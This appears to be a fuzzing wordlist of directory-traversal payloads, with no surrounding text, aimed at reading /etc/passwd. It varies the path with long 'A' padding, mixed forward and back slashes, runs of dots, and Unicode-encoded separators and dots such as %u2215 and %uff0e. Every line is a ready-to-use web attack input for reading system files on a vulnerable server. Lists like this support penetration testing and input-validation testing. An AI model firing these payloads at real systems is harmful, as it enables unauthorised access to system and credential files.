-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\/etc/passwd -...//etc/passwd -.../...//etc/passwd -.../.../...//etc/passwd -.../.../.../...//etc/passwd -.../.../.../.../...//etc/passwd -.../.../.../.../.../...//etc/passwd -.../.../.../.../.../.../...//etc/passwd -.../.../.../.../.../.../.../...//etc/passwd -...\/etc/passwd -...\...\/etc/passwd -...\...\...\/etc/passwd -...\...\...\...\/etc/passwd -...\...\...\...\...\/etc/passwd -...\...\...\...\...\...\/etc/passwd -...\...\...\...\...\...\...\/etc/passwd -...\...\...\...\...\...\...\...\/etc/passwd -....//etc/passwd -..../....//etc/passwd -..../..../....//etc/passwd -..../..../..../....//etc/passwd -..../..../..../..../....//etc/passwd -..../..../..../..../..../....//etc/passwd -..../..../..../..../..../..../....//etc/passwd -..../..../..../..../..../..../..../....//etc/passwd -....\/etc/passwd -....\....\/etc/passwd -....\....\....\/etc/passwd -....\....\....\....\/etc/passwd -....\....\....\....\....\/etc/passwd -....\....\....\....\....\....\/etc/passwd -....\....\....\....\....\....\....\/etc/passwd -....\....\....\....\....\....\....\....\/etc/passwd -..........................................................................//etc/passwd -........................................................................../..//etc/passwd -........................................................................../../..//etc/passwd -........................................................................../../../..//etc/passwd -........................................................................../../../../..//etc/passwd -........................................................................../../../../../..//etc/passwd -........................................................................../../../../../../..//etc/passwd -........................................................................../../../../../../../..//etc/passwd -..........................................................................\/etc/passwd -..........................................................................\..\/etc/passwd -..........................................................................\..\..\/etc/passwd -..........................................................................\..\..\..\/etc/passwd -..........................................................................\..\..\..\..\/etc/passwd -..........................................................................\..\..\..\..\..\/etc/passwd -..........................................................................\..\..\..\..\..\..\/etc/passwd -..........................................................................\..\..\..\..\..\..\..\/etc/passwd -..%u2215/etc/passwd -..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd -%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd 